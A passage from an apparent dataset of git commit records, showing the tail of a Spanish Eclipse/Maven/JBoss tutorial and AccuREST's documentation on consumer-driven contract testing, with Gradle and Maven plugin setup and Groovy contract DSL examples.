autom\u00e1ticamente el fichero POM del proyecto. 
Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nSi nos fijamos en la view Package Explorer o en la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, es probable que observemos un icono de Warning sobre el de proyecto. Vayamos ahora a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig055.png[]\n\nLo que nos dice Eclipse es que nuestro proyecto est\u00e1 configurado, en el fichero POM de Maven, para el JDK 1.6 y en nuestra m\u00e1quina tenemos uno distinto. Si tenemos actualizado el JDK es probable que se trate de la versi\u00f3n 1.8. Veamos qu\u00e9 significan las dos entradas de la figura anterior:\n\n* `maven.compiler.source`: indica al compilador la versi\u00f3n del lenguaje que debe interpretar al leer nuestro c\u00f3digo fuente. Por ejemplo si el valor que fijo para mi proyecto es 1.4 entonces no ser\u00e1 capaz de interpretar una clase gen\u00e9rica, que fue introducida en el JDK 1.5, y obtendremos un error de compilaci\u00f3n si existe alguna. Si por el contrario fijo digamos la versi\u00f3n 1.7 para un c\u00f3digo antiguo, sea de la versi\u00f3n 1.4, entonces tambi\u00e9n puedo obtener un error si por ejemplo en el c\u00f3digo antiguo us\u00e9 la palabra clave _enum_, ya que los enumerados se introducen en la versi\u00f3n 1.5 y en Java 1.7, al ser posterior, saltar\u00eda el error. 
Esto puede verse en la lista de incompatibilidades de la versi\u00f3n 5.0 de Java respecto de la anterior http:\/\/www.oracle.com\/technetwork\/java\/javase\/compatibility-137462.html[aqu\u00ed].\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff96e235b1f5859df4f287cd997363c4d7cea3c9","subject":"minimal configuration for gradle-spock-mockmvc","message":"minimal configuration for gradle-spock-mockmvc\n","repos":"pfrank13\/spring-cloud-contract,pfrank13\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,dstepanov\/accurest,spring-cloud\/spring-cloud-contract,Codearte\/accurest,dstepanov\/accurest,Codearte\/accurest,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"http:\/\/:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\n# 2.1. 
Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to use gradle or maven plugin.\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:1.0.6'\n\t}\n}\n\napply plugin: 'groovy'\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile('org.codehaus.groovy:groovy-all:2.4.6')\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.9.0' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. 
By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. 
If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. 
In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). 
What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. 
The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. 
It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also 
possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. 
Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article 